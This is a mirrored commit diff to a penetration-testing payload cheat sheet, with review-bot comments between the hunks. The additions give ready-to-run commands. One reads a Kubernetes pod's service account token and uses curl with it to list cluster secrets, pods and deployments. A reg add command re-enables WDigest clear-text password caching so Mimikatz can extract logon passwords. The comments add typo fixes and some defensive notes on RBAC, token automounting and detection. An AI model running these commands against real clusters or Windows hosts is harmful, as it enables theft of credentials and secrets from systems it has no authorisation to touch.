mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Kubernetes - Privileged Service Account Token
This commit is contained in:
parent
cf5a4b6e97
commit
1535c5f1b3
@ -12,6 +12,8 @@
|
|||||||
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
|
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
|
||||||
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
|
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
|
||||||
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
|
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
|
||||||
|
- [Privileged Service Account Token](#privileged-service-account-token)
|
||||||
|
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
|
||||||
- [API addresses that you should know](#api-adresses-that-you-should-know)
|
- [API addresses that you should know](#api-adresses-that-you-should-know)
|
||||||
- [References](#references)
|
- [References](#references)
|
||||||
|
|
||||||
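Review bot: the TOC entry `[API addresses that you should know](#api-adresses-that-you-should-know)` in the context lines has a typo in its anchor (`adresses`), so it does not resolve to the `## API addresses that you should know` heading added later in this commit; since the TOC is already being edited, change it to `#api-addresses-that-you-should-know`. The two new entries (`#privileged-service-account-token`, `#interesting-endpoints-to-reach`) match the headings introduced in the next hunk.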
@ -111,6 +113,29 @@ curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Conten
|
|||||||
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
|
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Privileged Service Account Token
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ cat /run/secrets/kubernetes.io/serviceaccount/token
|
||||||
|
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
|
||||||
|
```
|
||||||
|
|
||||||
|
## Interesting endpoints to reach
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# List Pods
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
|
||||||
|
|
||||||
|
# List secrets
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
|
||||||
|
|
||||||
|
# List deployments
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
|
||||||
|
|
||||||
|
# List daemonsets
|
||||||
|
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## API addresses that you should know
|
## API addresses that you should know
|
||||||
|
|
||||||
|
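Review bot: the deployments and daemonsets URLs in the new "Interesting endpoints to reach" block are missing the closing `>` after `<master_ip` (`https://<master_ip:<port>/apis/extensions/v1beta1/...`); they should read `https://<master_ip>:<port>/...` like the pods and secrets lines above them. Also, `extensions/v1beta1` no longer serves Deployments or DaemonSets on current clusters (removed in Kubernetes 1.16), so `/apis/apps/v1/namespaces/default/deployments` and `/apis/apps/v1/namespaces/default/daemonsets` are the paths that actually work. Both new fences are tagged `powershell` but contain `cat`/`curl` shell commands; `bash` renders them correctly. Since the section is about a pod's mounted service account token, it would help to say what prevents this: `automountServiceAccountToken: false` on the pod or service account, and RBAC that does not grant `list`/`get` on `secrets` to the workload's service account, which is what makes the `secrets` request shown here return 403.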
@ -21,6 +21,8 @@ mimikatz # sekurlsa::wdigest
|
|||||||
|
|
||||||
## Mimikatz - Extract passwords
|
## Mimikatz - Extract passwords
|
||||||
|
|
||||||
|
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
mimikatz_command -f sekurlsa::logonPasswords full
|
mimikatz_command -f sekurlsa::logonPasswords full
|
||||||
mimikatz_command -f sekurlsa::wdigest
|
mimikatz_command -f sekurlsa::wdigest
|
||||||
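Review bot: the added blockquote ("It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled") is ambiguous about what the backport changes. Suggest stating it explicitly: the update only adds the `UseLogonCredential` value; on those versions WDigest caching stays enabled until that value is set to 0, so `sekurlsa::wdigest` keeps returning clear-text passwords there by default. Minor wording: "since Win8.1 / 2012R2+" says the same thing twice ("since" and "+"); pick one.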
@ -28,8 +30,21 @@ mimikatz_command -f sekurlsa::wdigest
|
|||||||
# to re-enable wdigest in Windows Server 2012+
|
# to re-enable wdigest in Windows Server 2012+
|
||||||
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
|
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
|
||||||
# create a DWORD 'UseLogonCredential' with the value 1.
|
# create a DWORD 'UseLogonCredential' with the value 1.
|
||||||
|
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
:warning: To take effect, conditions are required :
|
||||||
|
- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
|
||||||
|
* Adding requires lock
|
||||||
|
* Removing requires signout
|
||||||
|
- Win10:
|
||||||
|
* Adding requires signout
|
||||||
|
* Removing requires signout
|
||||||
|
- Win2016:
|
||||||
|
* Adding requires lock
|
||||||
|
* Removing requires reboot
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Mini Dump
|
## Mimikatz - Mini Dump
|
||||||
|
|
||||||
Dump the lsass process.
|
Dump the lsass process.
|
||||||
|
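Review bot: the added `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1` line matches the comment above it, but the warning that follows (":warning: To take effect, conditions are required :") does not explain why the lock/sign-out/reboot list exists and has a stray space before the colon. Suggest "The value is only read at logon, so a new logon is needed before credentials are cached; what that takes depends on the OS:". It is also worth adding in the same block that this registry write is a well-known detection point: setting `WDigest\UseLogonCredential` to 1 is commonly alerted on (Sysmon Event ID 13, registry value set, is the usual source), so on a monitored host the change is likely to be noticed before the next logon happens.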
@ -13,6 +13,7 @@
|
|||||||
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
|
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
|
||||||
- [Remote Code Execution with Java](#remote-code-execution-with-java)
|
- [Remote Code Execution with Java](#remote-code-execution-with-java)
|
||||||
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
|
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
|
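Review bot: the new `- [References](#references)` entry only resolves if the file has a matching `## References` heading; that heading is outside this hunk, so confirm it exists (or is added in the same commit) before merging. Nothing else to flag for this TOC change.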